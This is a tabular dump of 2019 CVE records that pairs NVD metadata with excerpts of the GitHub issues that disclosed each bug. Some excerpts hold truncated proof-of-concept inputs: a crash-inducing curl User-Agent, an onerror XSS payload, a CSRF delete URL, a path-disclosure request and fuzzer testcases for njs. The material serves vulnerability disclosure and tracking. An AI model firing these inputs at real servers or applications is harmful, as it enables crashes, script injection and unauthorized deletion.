"url": "https://github.com/fekberg/GoHttp/issues/15"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.co... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gohttp_project:gohttp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AA61125C-0405-4672-892D-3E198E9B895F",
"versionEndExcluding": null,
"versionEndIncluding": "2017-07-25",
"versionS... | [
"416"
] | 416 | https://github.com/fekberg/GoHttp/issues/15 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"fekberg",
"GoHttp"
] | Steps to reproduce:
Compile GoHTTP Server (GCC and ASAN flags/LIBS).
Screen -S server
cd GoHTTP
./GoHTTP
CTRL-A, D (Detach from session)
Screen -S Request
curl 127.0.0.1:$runningport/hi.html
CTRL-A, D
Screen -R server
Dump:
==9215==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000009dc0... | Heap Use-After-Free Notification when compiling with ASAN on Ubuntu 16 GCC 5.4 | https://api.github.com/repos/fekberg/GoHttp/issues/15/comments | 5 | 2019-05-17T06:04:40Z | 2019-05-29T18:15:53Z | https://github.com/fekberg/GoHttp/issues/15 | 445,278,436 | 15 | 392 |
CVE-2019-12172 | 2019-05-17T23:29:00.237 | Typora 0.9.9.21.1 (1913) allows arbitrary code execution via a modified file: URL syntax in the HREF attribute of an AREA element, as demonstrated by file:\\\ on macOS or Linux, or file://C| on Windows. This is different from CVE-2019-12137. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/typora/typora-issues/issues/2166"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:typora:typora:0.9.9.21.1:*:*:*:*:*:*:*",
"matchCriteriaId": "847DE287-AB48-4DDA-AFAC-63CFF0749DCC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"22"
] | 22 | https://github.com/typora/typora-issues/issues/2166 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"typora",
"typora-issues"
] | ## Typora Version 0.9.9.21.1 (1913) Remote Code Execution Vulnerability
### Description:
Typora fails to sanitize input on HTML attributes. Abusing the `
file:\\` URI scheme on HTML attributes can result in arbitrary code execution. The below proof of concepts will execute calculator when opened inside of Typora ... | Typora Version 0.9.9.21.1 (1913) Remote Code Execution Vulnerability | https://api.github.com/repos/typora/typora-issues/issues/2166/comments | 3 | 2019-02-07T20:05:43Z | 2019-02-17T13:28:20Z | https://github.com/typora/typora-issues/issues/2166 | 407,875,218 | 2,166 | 393 |
CVE-2019-12173 | 2019-05-18T00:29:00.250 | MacDown 0.7.1 (870) allows remote code execution via a file:\\\ URI, with a .app pathname, in the HREF attribute of an A element. This is different from CVE-2019-12138. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/MacDownApp/macdown/issues/1050"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://git... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:macdown_project:macdown:0.7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "C9DE0D4A-C68A-41D7-885D-B543E72D72AD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"22"
] | 22 | https://github.com/MacDownApp/macdown/issues/1050 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"MacDownApp",
"macdown"
] | ## Macdown Version 0.7.1 (870) Remote Code Execution
Macdown version 0.7.1 (870) is affected by a remote code execution vulnerability. Macdown fails to sanitize input on HTML attributes. Abusing the`file:\\` URI scheme on HTML attributes can result in arbitrary code execution. The attached proof of concept will exec... | Macdown Version 0.7.1 (870) Remote Code Execution | https://api.github.com/repos/MacDownApp/macdown/issues/1050/comments | 7 | 2019-01-28T02:45:54Z | 2020-12-11T01:05:21Z | https://github.com/MacDownApp/macdown/issues/1050 | 403,630,763 | 1,050 | 394 |
CVE-2019-12198 | 2019-05-20T04:29:00.810 | In GoHttp through 2017-07-25, there is a stack-based buffer over-read via a long User-Agent header. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/fekberg/GoHttp/issues/18"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gohttp_project:gohttp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "50E70401-8EBD-4579-B203-317F1863D27C",
"versionEndExcluding": null,
"versionEndIncluding": "20170725",
"versionSta... | [
"125"
] | 125 | https://github.com/fekberg/GoHttp/issues/18 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"fekberg",
"GoHttp"
] | <pre><font color="#EF2929"><b>root@0xGotcha</b></font>:<font color="#729FCF"><b>~/fuzzing/GoHttp</b></font># curl -A "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... | stack-buffer-overflow 619 characters in User-Agent string causes stack-overflow. | https://api.github.com/repos/fekberg/GoHttp/issues/18/comments | 2 | 2019-05-19T18:57:53Z | 2019-05-20T11:57:08Z | https://github.com/fekberg/GoHttp/issues/18 | 445,852,089 | 18 | 395 |
CVE-2019-12206 | 2019-05-20T14:29:00.697 | njs through 0.3.1, used in NGINX, has a heap-based buffer overflow in nxt_utf8_encode in nxt_utf8.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/162"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ng... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.1",
"versionStartExcluding": null... | [
"787"
] | 787 | https://github.com/nginx/njs/issues/162 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | NJS version
```
changeset: 965:e0fdef4eb478
tag: tip
user: Dmitry Volyntsev <xeioex@nginx.com>
date: Thu May 16 15:20:31 2019 +0300
summary: Fixed uninitialized-memory-access in Object.defineProperties().
```
JavaScript testcase:
```js
var v0="@褀+Qh"
while (((((((((((((v0)>>>v0.... | heap-buffer-overflow in nxt_utf8_encode (nxt_utf8.c:32) | https://api.github.com/repos/nginx/njs/issues/162/comments | 0 | 2019-05-20T08:18:34Z | 2019-05-30T14:15:14Z | https://github.com/nginx/njs/issues/162 | 445,981,633 | 162 | 396 |
CVE-2019-12207 | 2019-05-20T14:29:00.773 | njs through 0.3.1, used in NGINX, has a heap-based buffer over-read in nxt_utf8_decode in nxt/nxt_utf8.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/168"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ng... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.1",
"versionStartExcluding": null... | [
"125"
] | 125 | https://github.com/nginx/njs/issues/168 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | Testcase (in base64):
```
bmV3IFJlZ0V4cChuZXcgUmVnRXhwKFJlZ0V4cCgobmV3IE9iamVjdCgiADs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7GDtzOzskOzs7OzsiLCAobmV3IEVycm9yKG5ldyBFcnJvcihuZXcgRXJyb3IobmV3IEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKCgwLTApKSkpKSkpKSk8PTApKSswKSkpKQo=
``... | heap-buffer-overflow in nxt_utf8_decode nxt/nxt_utf8.c:72 | https://api.github.com/repos/nginx/njs/issues/168/comments | 4 | 2019-05-20T09:01:01Z | 2019-06-20T12:24:14Z | https://github.com/nginx/njs/issues/168 | 446,000,306 | 168 | 397 |
CVE-2019-12208 | 2019-05-20T14:29:00.837 | njs through 0.3.1, used in NGINX, has a heap-based buffer overflow in njs_function_native_call in njs/njs_function.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/163"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ng... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.1",
"versionStartExcluding": null... | [
"787"
] | 787 | https://github.com/nginx/njs/issues/163 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | NJS version
```
changeset: 965:e0fdef4eb478
tag: tip
user: Dmitry Volyntsev <xeioex@nginx.com>
date: Thu May 16 15:20:31 2019 +0300
summary: Fixed uninitialized-memory-access in Object.defineProperties().
```
JavaScript testcase:
```js
var v0=Array()
while(v0.includes(v0.u,(Obje... | heap-buffer-overflow in njs_function_native_call njs/njs_function.c:623 | https://api.github.com/repos/nginx/njs/issues/163/comments | 1 | 2019-05-20T08:30:18Z | 2019-05-24T16:00:19Z | https://github.com/nginx/njs/issues/163 | 445,986,781 | 163 | 398 |
CVE-2019-12215 | 2019-05-20T16:29:01.320 | A full path disclosure vulnerability was discovered in Matomo v3.9.1 where a user can trigger a particular error to discover the full path of Matomo on the disk, because lastError.file is used in plugins/CorePluginsAdmin/templates/safemode.twig. NOTE: the vendor disputes the significance of this issue, stating "avoid r... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/matomo-org/matomo/issues/14464"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://git... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:matomo:matomo:3.9.1:*:*:*:*:*:*:*",
"matchCriteriaId": "1D513660-D70D-492C-99F7-41D619E86E0A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"209"
] | 209 | https://github.com/matomo-org/matomo/issues/14464 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"matomo-org",
"matomo"
] | A full path disclosure vulnerability was discovered in Matomo (v3.9.1) where a user can trigger a particular error to discover the full path of Matomo on the disk.
PAYLOAD
http://example.com/index.php?date=2019-04-20%2C2019-05-19&forceView=1&viewDataTable=test&module=API&action=get&widget=1&disableLink=0&idSite=1&p... | Full Path Disclosure | https://api.github.com/repos/matomo-org/matomo/issues/14464/comments | 8 | 2019-05-20T08:54:18Z | 2019-05-20T19:17:31Z | https://github.com/matomo-org/matomo/issues/14464 | 445,997,300 | 14,464 | 399 |
CVE-2019-12250 | 2019-05-21T16:29:01.877 | IdentityServer IdentityServer4 through 2.4 has stored XSS via the httpContext to the host/Extensions/RequestLoggerMiddleware.cs LogForErrorContext method, which can be triggered by viewing a log. NOTE: the software maintainer disputes that this is a vulnerability because the request logger is not part of IdentityServer... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/IdentityServer/IdentityServer4/issues/3279"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:identityserver:identityserver4:*:*:*:*:*:*:*:*",
"matchCriteriaId": "845B6EA6-4FFC-482B-BE5A-AB589A7201CB",
"versionEndExcluding": null,
"versionEndIncluding": "2.4.0",
"vers... | [
"79"
] | 79 | https://github.com/IdentityServer/IdentityServer4/issues/3279 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"IdentityServer",
"IdentityServer4"
] | Hi,
https://github.com/IdentityServer/IdentityServer4/blob/master/src/IdentityServer4/host/Extensions/RequestLoggerMiddleware.cs
in the LogForErrorContext method the PARAM httpContext is not filtred, and can be injected with XSS payload onerror="alert(String.fromCharCode(88,83,83)) in which can be triggred from th... | XSS in the RequestLoggerMiddleware.cs | https://api.github.com/repos/DuendeArchive/IdentityServer4/issues/3279/comments | 7 | 2019-05-21T07:00:37Z | 2020-01-10T19:49:59Z | https://github.com/DuendeArchive/IdentityServer4/issues/3279 | 446,448,651 | 3,279 | 400 |
CVE-2019-12253 | 2019-05-21T17:29:00.387 | my little forum before 2.4.20 allows CSRF to delete posts, as demonstrated by mode=posting&delete_posting. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ilosuna/mylittleforum/issues/468"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ilosuna/mylittleforum/releases... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mylittleforum:my_little_forum:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BB0B8C0-6EAE-4757-AC92-F3A60E31A0FD",
"versionEndExcluding": "2.4.20",
"versionEndIncluding": null,
"vers... | [
"352"
] | 352 | https://github.com/ilosuna/mylittleforum/issues/468 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ilosuna",
"mylittleforum"
] | Application is vulnerable for CSRF as CSRF token is not sent when a delete posting request is triggered.
There are two scenarios which I have observed in this request.
1. Delete request is a simple GET request :-
GET /ASLI_mylittleforum/index.php?mode=posting&delete_posting=2&back=index&delete_posting_confirm=tr... | CSRF token not present in delete posting request in admin panel | Manage posting | https://api.github.com/repos/My-Little-Forum/mylittleforum/issues/468/comments | 18 | 2019-05-06T07:10:31Z | 2019-05-14T12:25:40Z | https://github.com/My-Little-Forum/mylittleforum/issues/468 | 440,567,145 | 468 | 401 |
CVE-2016-10750 | 2019-05-22T14:29:00.223 | In Hazelcast before 3.11, the cluster join procedure is vulnerable to remote code execution via Java deserialization. If an attacker can reach a listening Hazelcast instance with a crafted JoinRequest, and vulnerable classes exist in the classpath, the attacker can run arbitrary code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.redhat.com/errata/RHSA-2019:2413"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/hazelcast/hazelcast/issues/8024"
},
{
"source": "cv... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hazelcast:hazelcast:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D207CCB-8DD3-4DB8-87B9-7766D37E98E3",
"versionEndExcluding": "3.11",
"versionEndIncluding": null,
"versionStartExcl... | [
"502"
] | 502 | https://github.com/hazelcast/hazelcast/issues/8024 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"hazelcast",
"hazelcast"
] | I emailed the support address on April 17 and received a response indicating that I should report my findings here. So here we are.
The Hazelcast cluster join procedure is vulnerable to remote code execution due to Java deserialization. If an attacker can reach a listening Hazelcast instance with a crafted `JoinReque... | Hazelcast is vulnerable to untrusted deserialization remote code execution | https://api.github.com/repos/hazelcast/hazelcast/issues/8024/comments | 10 | 2016-04-26T20:29:27Z | 2019-10-10T07:50:16Z | https://github.com/hazelcast/hazelcast/issues/8024 | 151,231,465 | 8,024 | 402 |
CVE-2019-12298 | 2019-05-23T14:29:07.813 | Leanify 0.4.3 allows remote attackers to trigger an out-of-bounds write (1024 bytes) via a modified input file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/JayXon/Leanify/issues/50"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/JayXon/Leanify/issues/50"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:leanify_project:leanify:0.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "08AC077C-4E5F-49EB-8429-B16451564D34",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"787"
] | 787 | https://github.com/JayXon/Leanify/issues/50 | [
"Third Party Advisory"
] | github.com | [
"JayXon",
"Leanify"
] | I found Leanify while doing some research and decided to use Radamsa to test the robustness of the application. It appears pretty solid. I grabbed a ton of test files and then ran this simple loop to generate some more files; for i in $(ls); do cat $i | radamsa; done.
I did note a few things that were interesting, t... | Fuzzing: Specially crafted input file results in repeatable crash when compiled with ASAN under Ubuntu/GCC. Allows for limited, controlled OOB read. | https://api.github.com/repos/JayXon/Leanify/issues/50/comments | 5 | 2019-05-20T17:43:12Z | 2019-05-23T23:09:46Z | https://github.com/JayXon/Leanify/issues/50 | 446,234,789 | 50 | 403 |
CVE-2019-12395 | 2019-05-28T13:29:00.490 | In Webbukkit Dynmap 3.0-beta-3 or below, due to a missing login check in servlet/MapStorageHandler.java, an attacker can see a map image without login even if victim enables login-required in setting. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://jvn.jp/en/jp/JVN89046645/index.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/webbukkit/dynmap/commit/641f142cd3ccdcbfb... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dynmap_project:dynmap:*:*:*:*:*:*:*:*",
"matchCriteriaId": "10C67B48-312F-4A2C-9FC8-174028401A86",
"versionEndExcluding": "3.0",
"versionEndIncluding": null,
"versionStartExc... | [
"287"
] | 287 | https://github.com/webbukkit/dynmap/issues/2474 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"webbukkit",
"dynmap"
] | <!-- Thank you for filing a bug report. Please make sure to fill out the required information specified in the template. -->
<!-- Do not delete the template, it contains required information and prevents your issues from being seen as an already logged bug. -->
<!-- Also be sure to include a appropriate title for you... | Required login bypass vulnerability | https://api.github.com/repos/webbukkit/dynmap/issues/2474/comments | 8 | 2019-05-02T08:18:24Z | 2019-10-02T01:11:35Z | https://github.com/webbukkit/dynmap/issues/2474 | 439,473,547 | 2,474 | 405 |
CVE-2019-12439 | 2019-05-29T15:29:00.377 | bubblewrap.c in Bubblewrap before 0.3.3 misuses temporary directories in /tmp as a mount point. In some particular configurations (related to XDG_RUNTIME_DIR), a local attacker may abuse this flaw to prevent other users from executing bubblewrap or potentially execute code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00028.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00015.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:projectatomic:bubblewrap:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D39BE3CC-42B1-4008-A900-798FA1445831",
"versionEndExcluding": "0.3.3",
"versionEndIncluding": null,
"versionSta... | [
"20"
] | 20 | https://github.com/projectatomic/bubblewrap/issues/304 | [
"Third Party Advisory"
] | github.com | [
"projectatomic",
"bubblewrap"
] | @jwilk reported this Debian bug ([#923557](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=923557)):
> [If] /run/user/\<UID\>/.bubblewrap/ doesn't exist and couldn't be created
> (as was the case on my system), bubblewrap falls back to
> /tmp/.bubblewrap-\<UID\>/. Local attacker could exploit this to prevent
>... | potentially insecure use of /tmp | https://api.github.com/repos/containers/bubblewrap/issues/304/comments | 9 | 2019-03-02T11:29:02Z | 2019-05-29T16:58:52Z | https://github.com/containers/bubblewrap/issues/304 | 416,387,886 | 304 | 406 |
CVE-2019-12452 | 2019-05-29T19:29:00.580 | types/types.go in Containous Traefik 1.7.x through 1.7.11, when the --api flag is used and the API is publicly reachable and exposed without sufficient access control (which is contrary to the API documentation), allows remote authenticated users to discover password hashes by reading the Basic HTTP Authentication or D... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "PARTIAL"... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://docs.traefik.io/configuration/api/#security"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/containous/traefik... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6C4D325D-3CB4-480F-97F0-3B0DFF21172F",
"versionEndExcluding": null,
"versionEndIncluding": "1.7.11",
"versionStartExclud... | [
"522"
] | 522 | https://github.com/containous/traefik/issues/4917 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"containous",
"traefik"
] | ### Do you want to request a *feature* or report a *bug*?
Bug
### Did you try using a 1.7.x configuration for the version 2.0?
- [ ] Yes
- [x] No
### What did you do?
- Enabled Traefik API, creating a frontend protected with a user / password (see reproduction case below)
- Fetched the API
### What ... | Authentication hashes are available through the API | https://api.github.com/repos/traefik/traefik/issues/4917/comments | 1 | 2019-05-29T14:19:49Z | 2019-09-01T00:53:44Z | https://github.com/traefik/traefik/issues/4917 | 449,837,929 | 4,917 | 407 |
CVE-2019-12457 | 2019-05-30T14:29:01.970 | FileRun 2019.05.21 allows images/extjs Directory Listing. This issue has been fixed in FileRun 2019.06.01. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://emreovunc.com/blog/en/FileRun-DirectoryListing-1.png"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://filerun.com/ch... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:afian:filerun:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7A03DAC2-0689-4E23-8ADD-B65DD6F7374F",
"versionEndExcluding": "2019.06.01",
"versionEndIncluding": null,
"versionStartExcl... | [
"22"
] | 22 | https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3 | [
"Third Party Advisory"
] | github.com | [
"EmreOvunc",
"FileRun-Vulnerabilities"
] | The now available FileRun update (2019.06.01) fixes the reported issues. The update can be installed from the FileRun control panel: https://docs.filerun.com/updating
Great work with your findings! Kindly drop us a quick message if you find anything else in the future, to give the many users of our software a chance... | Remediation | https://api.github.com/repos/EmreOvunc/FileRun-Vulnerabilities/issues/3/comments | 0 | 2019-07-01T18:36:51Z | 2020-01-09T19:21:11Z | https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3 | 462,853,557 | 3 | 408 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.